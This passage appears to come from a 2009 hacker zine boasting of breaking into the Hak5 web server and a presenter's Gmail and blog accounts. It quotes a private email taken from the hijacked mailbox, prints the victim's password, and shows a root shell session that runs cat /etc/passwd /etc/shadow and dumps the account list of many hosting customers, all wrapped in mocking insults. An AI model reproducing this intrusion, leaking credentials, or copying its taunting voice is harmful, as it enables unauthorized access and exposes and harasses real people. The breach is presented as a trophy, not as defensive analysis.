sense, covering everything from network security, open source and forensics, to
DIY modding and the homebrew scene. Then we wrap it all up with a healthy dose
of cocktails and geek comedy. Damn the warranties, it's time to Trust your
Technolust." - Hak5 team.

Oh dear. See, Hak5 are a bunch of no mark wannabes. They contribute nothing to
security but entertain people who own iPhones and macs and study CS. These
people get their buzz from claiming to be hardcore, leet and hackers. 

After owning Hak5 I decided I needed to do some research on them and watch an
episode. The most hilarious part (aside from mubix) was Darren, every episode
when interviewing the resident tech expert he says "I'll play the idiot here,
explain to me". De Niro better watch out, those acting skills are sharp. Out of
all the owns in this zine, I think the hak5 one will register the least - their
audience doesn't understand the concept of hacking.

Mubix is a part time presenter full time failure. The kind of loser who reuses
passwords, which is still common in 2009. Our friend Mubix though takes it to
another level. Not only did Mubix reuses his hak5 FORUM password on the admin
of his blog, he did so on his gmail account. Whilst pouring through his boring,
mailing list filled email account there was only one bit of fun I spotted.

This message below is from xorl (xorl.wordpress.com), internet security mystery
man! Mubix decided to email him and ask why people who are anti-security are so
damn scary!

Hi there,
First of all I had no intention to disregard your question.  I'm not against
people that have different viewpoints, something like that is completely
ridiculous. What would our world be if we were that narrow-minded.  Now, to
your question, well, I might not be the ideal person to ask this since I don't
have the background required to answer this  but anyway.  I believe that full
disclosure was useful and fun, everything from just informing an administrator
for a security hole or misconfiguration on his/her system(s) to reporting
critical vulnerabilities to crazy developers the disclosure was like
participating in a big family, you know, some of them were getting angry,
others were happy, but in both cases it was definitely a satisfying (from both
sides) experience.  Nowadays, there is nothing like that. Everything is just a
big trade, including the underground scene. I'm not affiliated with the
big-bad-blackhats either to begin with. Companies like ZDI, iDefense,
TrippingPoint, Secunia etc.  will do anything to get some fancy 0day bug (and
of course some exploit code would result in some more money to the guy that
sells it) and for what?  To get more money from companies that get more money
by other companies...  This sounds just like the police/drag world scenario
written in Phrack #64 [1] and it's worst than that, since here we are not
dealing with hackers and feds or whitehats but with companies and companies
(aka. money and money). No ethics at all.  What's the point of disclosing
anything?  If you're interested in security not for money or fame like I do,
what's the point of disclosing a bug? Some people think that guys who own 0days
(aka.  hackers according to rattle's definition [2]) are hanging around owning
random boxes to steal credit cards and personal information.  In some cases
this might be true, but in the majority of the people I know it isn't.	The
whole full disclosure concept is transformed, more and more, to a corporate
methodology, initially, full disclosure (at least the first policies for full
disclosure [3]) were made to provide a responsible disclosure to the vendor but
now this is just money.  Nobody really cares about security.  Do you honestly
believe that a sec. company would disclose an important bug that bought from
some random guy? For example, if Immunty Inc. got a remote root for OpenSSH
would it _ever_ disclose it? I hardly thing so. Its pen-testers will use it to
prove the insecurity of their clients and take advantage of their fear by
obtaining more money.  There are a few people who care about security because
they really want to learn anything about their systems (even if that is illegal
in some cases), as far as I know none of them wants to get involved in this
theater.  That's why I do not support full disclosure, it won't help anyone, or
at least anyone that I wanted to help. Furthermore, most of these companies do
not even care about contributing to their security industry. Almost every
important security concept was introduced either by some brilliant individual
[4, 5] who wanted to share that knowledge or in Phrack [6] or similar
non-profit organizations [7, 8]. That's another fact to demonstrate that those
who talk about security do not care that much.	My blog is (well, I hope it is)
just another place to help people interested in security learn about
vulnerabilities through already known public ones which it worked for me, but
disclosing vulnerabilities or giving exploit codes for every post I make won't
really help. I mean, have a look at the comments of sgrakkyu's amazing release
[9]. His exploit code is like an elite tutorial in advanced exploitation and
the people didn't appreciate it.  He has remote SELinux disabling, vsyscall
overwrites, reliability optimizations (check out his code for the ABORT packets
etc.). Nobody said anything about these.  :-( In addition to that, people
hanging around doing XSS and SQL injections and they are calling themselves
security experts, pen-testers or even worst, hackers.  I had the great
opportunity to meet people like those described by PHC when talking about ~el8
[10].  They knew everything and never did what those guys do for fame or money.
 To conclude, many ways to see this... If you're a whitehat then you live in an
illusion that you're helping in securing our world. If you're blackhat you're
experiencing this as a war...  For me... I am just doing my hobby for fun. I do
not want to get involved into any of these and for the above reasons I *don't*
want to contribute in securing anything in this theater.

Once again, I might not be the right person to ask this question.


[1] http://phrack.org/issues.html?issue=64&id=4&mode=txt

[2] http://www.awarenetwork.org/etc/hacker.htm

[3] http://www.wiretrip.net/rfp/policy.html

[4] http://freeworld.thc.org/root/docs/exploit_writing/sol-ne-stack.html

[5] http://packetstormsecurity.org/papers/attack/VAstacksmash.txt

[6] http://phrack.org/

[7] http://uninformed.org/

[8] http://www.awarenetwork.org/etc/

[9] http://kernelbof.blogspot.com/

[10] http://www.phiral.net/blackhatbloc/phrack/texts/hack4.txt

-- some guy on the internet

/* Wow, citations even! This dude isn't so bad all in all, we have no intention
*  of getting him involved either */


/* Funny? I haven't even started yet. Continuing the story - Mubix to his credit
*  spotted someone logging into his gmail in gmail's new activity monitor! What
*  happened next only serves to embarass Mubix to the point that his "career"
*  should be over and he should induce spontanious hilarity upon anyone who hears
*  the story. */


  Ok, I don't believe in coincidence, someone has a 0day for gmail because 
that is too many people getting compromised without linking facts..about 
11 hours ago from TweetDeck 

// That's his take on how he got owned.

  That's the 4th person that I've talked to that has had a foreign IP 
address accessing their Gmail account using a Browser.about 11 hours ago 
from TweetDeck

// Maybe I wasn't alone?

  All instances have been detected using Google's "Activity on this 
account" alerts at the bottom of the Gmail pageabout 11 hours ago from 
TweetDeck

// :(

  This could be a flaw in Gmail's application where it gets mixed up, but 
a 2 of the cases have had emails in their sent emails boxabout 11 hours 
ago from TweetDeck

// MORON.


  Sorry for the alarm guys, not trying to create a panic, 4 all just 
recently.about 11 hours ago from TweetDeck

// Not trying to create panic, you just told all your security tweeting friends
// that there is a gmail 0day. You are a fucking idiot.

// Anyway, time for the hack logs...One other thing, Mubix' password was gegameri

// What a tool.

root@www.hak5.org's password:
Last login: Wed Jul  8 10:13:11 2009 from 173.121.135.241
root@web02 [~]# uname -a; id; w
Linux web02.divergentnetworks.com 2.6.18-128.1.14.el5 #1 SMP Wed Jun 17
06:40:54 EDT 2009 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
 05:20:01 up 13 days, 10:40,  1 user,  load average: 0.38, 0.44, 0.38
USER	 TTY	  FROM		    LOGIN@   IDLE   JCPU   PCPU WHAT
root	 ttyS1	  -		   28Jun09 13days  0.01s  0.01s -bash
root@web02 [~]# last
root	 pts/0	      173.121.135.241  Wed Jul	8 10:13 - 12:24  (02:11)
root	 pts/2	      wsip-70-169-152- Mon Jun 29 08:24 - 10:35  (02:11)
root	 pts/1	      ip68-230-200-167 Mon Jun 29 06:53 - 08:44  (01:51)
root	 pts/0	      ip68-230-200-167 Sun Jun 28 22:13 - 12:40  (14:26)
root	 pts/4	      10.0.80.131      Sun Jun 28 19:17 - 19:26  (00:09)
root	 pts/4	      ppp-69-221-242-8 Sun Jun 28 19:02 - 19:03  (00:01)
root	 ttyS1			       Sun Jun 28 18:48   still logged in
root	 pts/3	      ip70-186-193-179 Sun Jun 28 18:46 - 21:56  (03:10)
root	 pts/2	      shell01.dal01.so Sun Jun 28 18:44 - 21:36  (02:52)
root	 pts/1	      71-84-66-21.dhcp Sun Jun 28 18:42 - 23:54  (05:11)
root	 pts/0	      ip70-186-193-179 Sun Jun 28 18:40 - 20:54  (02:13)
reboot	 system boot  2.6.18-128.1.14. Sun Jun 28 18:40 	(13+10:39)
root	 pts/3	      shell01.dal01.so Sun Jun 28 17:38 - crash  (01:01)
root	 pts/2	      ip70-186-193-179 Sun Jun 28 17:25 - crash  (01:14)
root	 pts/1	      ip70-186-193-179 Sun Jun 28 17:24 - crash  (01:16)
root	 pts/0	      10.0.80.84       Sun Jun 28 17:22 - crash  (01:17)
reboot	 system boot  2.6.18-128.1.14. Sun Jun 28 17:20 	(13+11:59)
root	 pts/0	      ip70-186-193-179 Sun Jun 28 16:39 - crash  (00:41)
reboot	 system boot  2.6.18-128.1.14. Sun Jun 28 16:38 	(13+12:41)
root	 pts/3	      10.0.80.131      Sun Jun 28 15:51 - crash  (00:47)
root	 pts/2	      ip70-186-193-179 Sun Jun 28 15:35 - crash  (01:02)
root	 pts/1	      10.0.80.131      Sun Jun 28 15:29 - crash  (01:08)
root	 pts/0	      ip70-186-193-179 Sun Jun 28 15:29 - crash  (01:09)
reboot	 system boot  2.6.18-92.el5    Sun Jun 28 15:26 	(13+13:53)
root	 pts/0	      ip70-186-193-179 Sun Jun 28 15:19 - crash  (00:07)
reboot	 system boot  2.6.18-128.1.14. Sun Jun 28 15:17 	(13+14:02)
reboot	 system boot  2.6.18-128.1.14. Sun Jun 28 15:14 	(13+14:05)
root	 pts/1	      10.0.80.131      Sun Jun 28 15:11 - crash  (00:03)
root	 pts/0	      ip70-186-193-179 Sun Jun 28 15:09 - crash  (00:05)
reboot	 system boot  2.6.18-128.1.14. Sun Jun 28 15:08 	(13+14:11)
root	 pts/1	      ip70-186-193-179 Sun Jun 28 14:33 - crash  (00:35)
root	 pts/0	      10.0.80.131      Sun Jun 28 14:27 - crash  (00:41)
reboot	 system boot  2.6.18-128.1.14. Sun Jun 28 14:24 	(13+14:55)
root	 ttyS1			       Sun Jun 28 14:17 - 14:19  (00:01)
root	 pts/3	      10.0.80.131      Sun Jun 28 13:07 - crash  (01:17)
root	 pts/1	      ip70-186-193-179 Sun Jun 28 13:04 - 13:46  (00:41)
root	 pts/0	      ip70-186-193-179 Sun Jun 28 13:04 - 14:10  (01:05)
reboot	 system boot  2.6.18-128.1.14. Sun Jun 28 13:03 	(13+16:16)
root	 pts/1	      ip70-186-193-179 Sun Jun 28 12:37 - 12:52  (00:15)
root	 pts/0	      ip70-186-193-179 Sun Jun 28 12:32 - crash  (00:31)
reboot	 system boot  2.6.18-128.1.14. Sun Jun 28 12:31 	(13+16:48)
root	 pts/1	      ip70-186-193-179 Sun Jun 28 12:01 - down	 (00:27)
root	 pts/0	      ip70-186-193-179 Sun Jun 28 11:58 - down	 (00:30)
reboot	 system boot  2.6.18-92.el5    Sun Jun 28 11:57 	 (00:30)
root	 pts/1	      ip70-186-193-179 Sun Jun 28 11:32 - crash  (00:25)
root	 pts/0	      ip70-186-193-179 Sun Jun 28 11:31 - crash  (00:25)
reboot	 system boot  2.6.18-92.el5    Sun Jun 28 11:30 	 (00:57)
root	 pts/1	      ip70-186-193-179 Sun Jun 28 11:20 - down	 (00:07)
root	 pts/0	      ip70-186-193-179 Sun Jun 28 11:05 - down	 (00:22)
reboot	 system boot  2.6.18-92.el5    Sun Jun 28 11:03 	 (00:24)
root	 pts/0	      ip70-186-193-179 Sun Jun 28 10:57 - crash  (00:05)
reboot	 system boot  2.6.18-92.el5    Sun Jun 28 10:52 	 (00:34)
root	 pts/0	      wsip-70-169-152- Wed Jun 24 14:18 - 17:29  (03:11)
root	 pts/1	      ip70-186-193-179 Tue Jun	9 20:51 - 02:10  (05:18)
root	 pts/0	      ip70-186-193-179 Mon Jun	8 21:18 - 20:30 (2+23:11)
root	 pts/0	      wsip-70-169-152- Mon Jun	8 13:41 - 14:03  (00:22)
root	 pts/0	      ip70-186-193-179 Sun Jun	7 20:20 - 22:31  (02:11)
root	 pts/0	      ip70-186-193-179 Sun Jun	7 15:52 - 16:02  (00:09)
root	 pts/0	      adsl-69-209-99-8 Thu Jun	4 22:38 - 01:28  (02:49)
root	 pts/0	      adsl-69-209-99-8 Thu Jun	4 12:25 - 14:39  (02:14)
root	 pts/0	      adsl-69-209-99-8 Thu Jun	4 01:09 - 01:10  (00:00)
root	 pts/0	      wsip-70-169-152- Fri May 29 11:28 - 13:40  (02:11)
root	 pts/0	      wsip-70-169-152- Wed May 27 14:44 - 15:57  (01:12)
reboot	 system boot  2.6.18-92.el5    Wed May 27 14:44 	(31+20:43)
root	 pts/0	      wsip-70-169-152- Wed May 27 14:38 - crash  (00:06)
reboot	 system boot  2.6.18-92.el5    Sat May 23 14:10 	(35+21:16)
root	 pts/0	      231.sub-75-202-2 Thu May 14 22:19 - 22:29  (00:09)
root	 pts/1	      45.sub-75-201-23 Fri May	8 20:56 - 23:11  (02:14)
root	 pts/0	      21.sub-75-251-18 Fri May	8 20:36 - 22:59  (02:23)
root	 pts/0	      ip68-110-152-240 Tue May	5 17:20 - 22:00  (04:39)
hak5	 pts/0	      ip68-110-152-240 Fri May	1 19:27 - 19:27  (00:00)
hak5darr pts/0	      ip68-110-152-240 Fri May	1 19:25 - 19:26  (00:01)
root	 pts/0	      wsip-70-169-152- Tue Apr 28 11:06 - 13:18  (02:11)
root	 pts/0	      wsip-70-169-152- Mon Apr 27 12:25 - 14:38  (02:13)
root	 pts/0	      ip68-110-152-240 Sat Apr 25 13:55 - 14:03  (00:08)
reboot	 system boot  2.6.18-92.el5    Fri Apr 24 18:35 	(64+16:51)
root	 pts/1	      adsl-69-208-66-1 Thu Apr 23 12:33 - 13:13  (00:39)
root	 pts/0	      wsip-70-169-152- Thu Apr 23 12:25 - crash (1+06:10)
root	 pts/1	      wsip-70-169-152- Wed Apr 22 12:23 - 14:34  (02:11)
root	 pts/0	      wsip-70-169-152- Wed Apr 22 11:19 - 13:31  (02:11)
root	 pts/0	      wsip-70-169-152- Mon Apr 20 12:20 - 14:32  (02:11)
root	 pts/0	      ip68-110-152-240 Fri Apr 17 19:10 - 00:01 (2+04:51)
root	 pts/0	      adsl-75-36-7-30. Fri Apr 10 18:30 - 19:05  (00:35)
root	 pts/0	      wsip-70-169-152- Tue Mar 31 08:28 - 10:42  (02:14)
root	 pts/0	      wsip-70-169-152- Fri Mar 27 10:31 - 13:12  (02:41)
root	 pts/0	      wsip-70-169-152- Tue Mar	3 14:11 - 16:22  (02:11)
root	 pts/0	      wsip-70-169-152- Tue Mar	3 08:55 - 11:16  (02:20)
hak5darr pts/0	      ip68-110-152-240 Thu Feb 26 18:15 - 01:27  (07:11)
hak5	 pts/1	      ip68-110-152-240 Tue Feb 24 18:21 - 22:18  (03:56)
hak5	 pts/1	      ip68-110-152-240 Tue Feb 24 18:17 - 18:21  (00:03)
hak5darr pts/0	      ip68-110-152-240 Tue Feb 24 02:54 - 02:29  (23:35)
hak5darr pts/0	      ip68-110-152-240 Tue Feb 24 02:52 - 02:53  (00:00)
hak5darr pts/0	      ip68-110-152-240 Tue Feb 24 02:52 - 02:52  (00:00)
hak5darr pts/0	      ip68-110-152-240 Tue Feb 24 02:06 - 02:50  (00:44)
hak5darr pts/0	      ip68-110-152-240 Tue Feb 24 02:04 - 02:05  (00:00)
hak5	 pts/1	      ip68-110-152-240 Mon Feb 23 19:31 - 22:40  (03:08)
root	 pts/0	      wsip-70-169-152- Mon Feb 23 17:33 - 20:07  (02:34)
reboot	 system boot  2.6.18-92.el5    Mon Feb 23 17:24 	(124+17:02)
root	 pts/0	      ip68-110-152-240 Thu Feb	5 22:50 - 23:49  (00:59)
root	 pts/0	      wsip-70-169-152- Wed Feb	4 10:23 - 12:49  (02:26)
root	 pts/0	      209.158.217.33   Tue Feb	3 13:35 - 13:49  (00:13)
root	 pts/0	      wsip-70-169-152- Mon Feb	2 12:46 - 16:22  (03:35)
root	 pts/0	      ip68-110-152-240 Sat Jan 31 10:41 - 13:08  (02:26)
root	 pts/0	      wsip-70-169-152- Fri Jan 30 13:43 - 16:23  (02:39)
root	 pts/0	      wsip-70-169-152- Fri Jan 30 08:44 - 11:20  (02:35)
root	 pts/1	      wsip-70-169-152- Wed Jan 21 13:03 - 13:04  (00:00)
root	 pts/0	      wsip-70-169-152- Wed Jan 21 11:25 - 13:57  (02:32)
root	 pts/0	      ip68-110-152-240 Sat Jan 17 00:26 - 01:58  (01:31)
hak5	 pts/0	      63.164.47.227    Sun Jan 11 19:36 - 19:36  (00:00)
root	 pts/0	      ip68-110-152-240 Sun Dec 28 15:30 - 15:34  (00:04)
reboot	 system boot  2.6.18-92.el5    Sat Dec 27 12:02 	(182+22:25)
root	 pts/0	      cpe-66-61-3-125. Tue Dec 23 00:28 - 00:32  (00:04)
reboot	 system boot  2.6.18-92.el5    Tue Dec 23 00:24 	(187+10:03)
root	 pts/0	      wsip-70-169-152- Wed Dec 17 15:31 - 15:31  (00:00)
root	 pts/0	      ip68-110-152-240 Tue Dec 16 23:13 - 23:43  (00:29)
root	 pts/0	      wsip-70-169-152- Mon Dec 15 15:42 - 17:56  (02:13)
root	 pts/0	      wsip-70-169-152- Fri Dec 12 10:39 - 10:50  (00:11)
root	 pts/0	      wsip-70-169-152- Thu Dec 11 11:10 - 11:37  (00:27)
root	 pts/1	      wsip-70-169-152- Tue Dec	9 12:11 - 11:16  (23:05)
root	 pts/0	      wsip-70-169-152- Tue Dec	9 12:09 - 14:20  (02:11)
reboot	 system boot  2.6.18-92.el5    Tue Dec	9 12:02 	(200+22:25)
root	 pts/1	      wsip-70-169-152- Tue Dec	9 11:56 - down	 (00:02)
root	 pts/0	      70.169.152.226   Tue Dec	9 11:28 - 11:58  (00:29)
reboot	 system boot  2.6.18-92.el5    Tue Dec	9 11:14 	 (00:45)
root	 pts/1	      70.169.152.226   Tue Dec	9 11:09 - down	 (00:01)
root	 pts/1	      ip68-110-152-240 Mon Dec	8 19:43 - 22:52  (03:09)
root	 pts/1	      wsip-70-169-152- Fri Dec	5 12:51 - 16:06  (03:15)
root	 pts/1	      wsip-70-169-152- Tue Dec	2 11:04 - 05:23  (18:19)
root	 pts/1	      ip68-110-152-240 Sun Nov 30 13:53 - 23:30  (09:37)
root	 pts/1	      ip68-110-152-240 Fri Nov 28 21:55 - 22:33  (00:38)
root	 pts/1	      ip68-110-152-240 Fri Nov 28 14:33 - 20:00  (05:27)
root	 pts/1	      71-38-119-251.ph Tue Nov 25 19:01 - 19:04  (00:02)
root	 pts/1	      71-38-119-251.ph Tue Nov 25 19:01 - 19:01  (00:00)
root	 pts/2	      ip68-110-152-240 Tue Nov 25 19:00 - 19:03  (00:03)
rickdurk pts/1	      71-38-119-251.ph Tue Nov 25 18:51 - 19:00  (00:08)
root	 pts/1	      ip68-110-152-240 Sun Nov 23 23:14 - 23:59  (00:45)
root	 pts/1	      ip68-110-152-240 Sun Nov 23 23:13 - 23:13  (00:00)
root	 pts/1	      ip68-110-152-240 Sat Nov 15 16:17 - 16:37  (00:20)
metroa2z pts/1	      ip70-162-234-107 Thu Nov	6 22:42 - 00:54  (02:11)
metroa2z pts/1	      ip70-162-234-107 Thu Nov	6 22:31 - 22:42  (00:11)
metroa2z pts/1	      ip70-162-234-107 Thu Nov	6 22:28 - 22:29  (00:00)
metroa2z pts/1	      ip70-162-234-107 Wed Nov	5 17:03 - 17:48  (00:44)
root	 pts/1	      wsip-70-169-152- Wed Oct	8 07:49 - 08:54 (2+01:04)
root	 pts/1	      wsip-70-169-152- Mon Oct	6 12:05 - 17:13 (1+05:08)
root	 pts/0	      wsip-70-169-152- Thu Sep 18 15:25 - 15:25  (23:59)
root	 pts/0	      wsip-70-169-152- Thu Sep 11 07:32 - 01:59  (18:26)
root	 pts/0	      wsip-70-169-152- Tue Sep	9 10:31 - 15:51  (05:20)
root	 pts/0	      ip68-110-152-240 Fri Sep	5 15:51 - 18:03  (02:12)
root	 pts/0	      wsip-70-169-152- Wed Sep	3 08:06 - 16:44 (1+08:38)
root	 pts/0	      ip68-110-152-240 Tue Sep	2 21:16 - 23:18  (02:02)
root	 pts/0	      wsip-70-169-152- Wed Aug 27 12:20 - 16:03  (03:43)
root	 pts/0	      71-37-217-148.ph Mon Aug 18 13:19 - 14:10  (00:51)
root	 pts/0	      ip68-110-152-240 Sun Aug 17 16:13 - 06:51  (14:37)
reboot	 system boot  2.6.18-92.el5    Sun Aug 17 16:12 	(113+19:58)
root	 pts/2	      ip70-176-166-74. Thu Aug 14 23:03 - 23:14  (00:11)
root	 pts/0	      ip68-110-152-240 Thu Aug 14 23:02 - 23:11  (00:09)
root	 pts/2	      71-37-217-148.ph Mon Aug 11 14:54 - 15:52  (00:58)
root	 pts/0	      71-37-217-148.ph Mon Aug 11 12:29 - 16:39  (04:10)
root	 pts/0	      71-223-146-65.ph Wed Aug	6 16:21 - 16:32  (00:10)
root	 pts/2	      wsip-70-169-152- Thu Jul 31 14:51 - 15:37  (00:45)
root	 pts/0	      71-223-146-65.ph Thu Jul 31 13:02 - 15:02  (02:00)
root	 pts/0	      71-223-146-65.ph Tue Jul 29 19:54 - 20:01  (00:07)
root	 pts/0	      71-223-146-65.ph Tue Jul 29 12:00 - 14:12  (02:12)
root	 pts/2	      cpc1-rdng6-0-0-c Thu Jul 24 05:13 - 05:31  (00:17)
root	 pts/1	      cpc1-rdng6-0-0-c Thu Jul 24 05:13 - 05:31  (00:17)
root	 pts/2	      ip68-110-152-240 Tue Jul 22 23:44 - 00:24  (00:40)
root	 pts/1	      ip68-110-152-240 Tue Jul 22 22:29 - 06:40  (08:11)
root	 pts/0	      wsip-70-169-152- Tue Jul 22 15:02 - 17:14 (3+02:12)
root	 pts/0	      wsip-70-169-152- Tue Jul 22 15:01 - 15:02  (00:01)
root	 pts/1	      wsip-70-169-152- Tue Jul 22 13:04 - 15:15  (02:11)
root	 pts/0	      wsip-70-169-152- Tue Jul 22 12:10 - 14:36  (02:25)
reboot	 system boot  2.6.18-92.el5    Tue Jul 22 12:09 	(140+00:01)
root	 pts/1	      wsip-70-169-152- Tue Jul 22 12:05 - down	 (00:01)
root	 pts/0	      wsip-70-169-152- Tue Jul 22 11:14 - down	 (00:53)
root	 pts/1	      wsip-70-169-152- Tue Jul 22 09:37 - 11:48  (02:11)
root	 pts/0	      wsip-70-169-152- Tue Jul 22 07:41 - 09:54  (02:13)
reboot	 system boot  2.6.18-92.el5    Tue Jul 22 07:40 	 (04:26)
root	 pts/0	      wsip-70-169-152- Tue Jul 22 07:29 - down	 (00:08)
root	 pts/0	      71-223-146-65.ph Mon Jul 21 17:35 - 17:36  (00:00)
root	 pts/2	      wsip-70-169-152- Mon Jul 21 15:15 - 17:37  (02:21)
root	 pts/2	      wsip-70-169-152- Mon Jul 21 15:15 - 15:15  (00:00)
root	 pts/2	      71-223-146-65.ph Mon Jul 21 13:05 - 13:52  (00:47)
root	 pts/0	      wsip-70-169-152- Mon Jul 21 13:02 - 15:43  (02:41)
root	 pts/0	      wsip-70-169-152- Mon Jul 21 13:01 - 13:01  (00:00)
root	 pts/2	      wsip-70-169-152- Mon Jul 21 08:45 - 11:00  (02:15)
root	 pts/1	      shell01.dal01.so Mon Jul 21 07:56 - 11:38  (03:42)
root	 pts/0	      wsip-70-169-152- Mon Jul 21 07:48 - 09:59  (02:11)
root	 pts/0	      ip68-110-152-240 Fri Jul 11 00:46 - 01:47  (01:00)
reboot	 system boot  2.6.18-92.el5    Fri Jul 11 00:46 	(11+06:51)
reboot	 system boot  2.6.18-92.el5    Fri Jul 11 00:07 	 (00:35)
reboot	 system boot  2.6.18-92.el5    Thu Jul 10 18:03 	 (06:02)

wtmp begins Thu Jul 10 18:03:01 2008
root@web02 [~]# cat /etc/passwd /etc/shadow
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
cpanel:x:32001:32001::/usr/local/cpanel:/bin/false
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:100:103:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/false
cpanelhorde:x:32003:32005::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/
bin/noshell
cpanelphpmyadmin:x:32004:32006::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/loc
al/cpanel/bin/noshell
cpanelphppgadmin:x:32005:32007::/var/cpanel/userhomes/cpanelphppgadmin:/usr/loc
al/cpanel/bin/noshell
cpanelroundcube:x:32006:32008::/var/cpanel/userhomes/cpanelroundcube:/usr/local
/cpanel/bin/noshell
rvadmin:x:32007:32009::/home/rvadmin:/usr/local/cpanel/bin/noshell
securervskin:x:32008:32010::/home/rvadmin:/sbin/nologin
divergen:x:32009:32011::/home/divergen:/usr/local/cpanel/bin/noshell
azsmile:x:32011:32013::/home/azsmile:/usr/local/cpanel/bin/noshell
bigrv4le:x:32013:32015::/home2/bigrv4le:/usr/local/cpanel/bin/noshell
bizpartn:x:32015:32017::/home/bizpartn:/usr/local/cpanel/bin/noshell
brannock:x:32016:32018::/home/brannock:/usr/local/cpanel/bin/noshell
calmdrag:x:32017:32019::/home/calmdrag:/usr/local/cpanel/bin/noshell
cgerling:x:32020:32022::/home/cgerling:/bin/bash
charming:x:32021:32023::/home/charming:/usr/local/cpanel/bin/noshell
chewonth:x:32022:32024::/home/chewonth:/usr/local/cpanel/bin/noshell
comefind:x:32023:32025::/home2/comefind:/usr/local/cpanel/bin/noshell
cosmetic:x:32024:32026::/home/cosmetic:/usr/local/cpanel/bin/noshell
cpshout:x:32025:32027::/home/cpshout:/usr/local/cpanel/bin/noshell
curly:x:32026:32028::/home2/curly:/usr/local/cpanel/bin/noshell
dcsguys:x:32027:32029::/home/dcsguys:/usr/local/cpanel/bin/noshell
drfergus:x:32028:32030::/home/drfergus:/usr/local/cpanel/bin/noshell
drkhaksa:x:32029:32031::/home2/drkhaksa:/usr/local/cpanel/bin/noshell
ellis:x:32031:32033::/home/ellis:/usr/local/cpanel/bin/noshell
fineberg:x:32033:32035::/home/fineberg:/usr/local/cpanel/bin/noshell
fitzy:x:32034:32036::/home2/fitzy:/usr/local/cpanel/bin/noshell
gamingsi:x:32036:32038::/home2/gamingsi:/usr/local/cpanel/bin/noshell
habrown:x:32037:32039::/home2/habrown:/usr/local/cpanel/bin/noshell
hak5:x:32038:32040::/home2/hak5:/bin/bash
hercules:x:32040:32042::/home/hercules:/usr/local/cpanel/bin/noshell
hfcazc:x:32041:32043::/home/hfcazc:/usr/local/cpanel/bin/noshell
hterry3:x:32042:32044::/home2/hterry3:/usr/local/cpanel/bin/noshell
judyhuey:x:32047:32049::/home/judyhuey:/usr/local/cpanel/bin/noshell
justingr:x:32048:32050::/home2/justingr:/usr/local/cpanel/bin/noshell
jwbass:x:32049:32051::/home/jwbass:/usr/local/cpanel/bin/noshell
kamerch:x:32050:32052::/home2/kamerch:/usr/local/cpanel/bin/noshell
lafayett:x:32052:32054::/home/lafayett:/usr/local/cpanel/bin/noshell
linuxjoe:x:32054:32056::/home/linuxjoe:/usr/local/cpanel/bin/noshell
logoall:x:32055:32057::/home/logoall:/bin/bash
madera:x:32056:32058::/home/madera:/usr/local/cpanel/bin/noshell
mlestock:x:32057:32059::/home2/mlestock:/bin/bash
metdent:x:32058:32060::/home2/metdent:/usr/local/cpanel/bin/noshell
milldent:x:32059:32061::/home/milldent:/usr/local/cpanel/bin/noshell
mydtc:x:32060:32062::/home/mydtc:/usr/local/cpanel/bin/noshell
mygarden:x:32061:32063::/home/mygarden:/usr/local/cpanel/bin/noshell
norton:x:32062:32064::/home/norton:/usr/local/cpanel/bin/noshell
otokobos:x:32064:32066::/home/otokobos:/usr/local/cpanel/bin/noshell
paseo:x:32065:32067::/home/paseo:/usr/local/cpanel/bin/noshell
pcidenta:x:32066:32068::/home/pcidenta:/bin/false
pietrzak:x:32068:32070::/home/pietrzak:/usr/local/cpanel/bin/noshell
practice:x:32069:32071::/home/practice:/bin/bash
prospect:x:32070:32072::/home/prospect:/usr/local/cpanel/bin/noshell
qdental:x:32071:32073::/home/qdental:/usr/local/cpanel/bin/noshell
recreal:x:32072:32074::/home/recreal:/usr/local/cpanel/bin/noshell
rickdurk:x:32074:32076::/home/rickdurk:/bin/bash
sadistic:x:32075:32077::/home2/sadistic:/usr/local/cpanel/bin/noshell
scream:x:32076:32078::/home2/scream:/usr/local/cpanel/bin/noshell
sethdiv:x:32077:32079::/home2/sethdiv:/usr/local/cpanel/bin/noshell
sethryde:x:32078:32080::/home2/sethryde:/usr/local/cpanel/bin/noshell
sharpsmi:x:32079:32081::/home/sharpsmi:/usr/local/cpanel/bin/noshell
sladellc:x:32080:32082::/home/sladellc:/usr/local/cpanel/bin/noshell
smilearc:x:32081:32083::/home/smilearc:/usr/local/cpanel/bin/noshell
soundid:x:32083:32085::/home/soundid:/bin/false
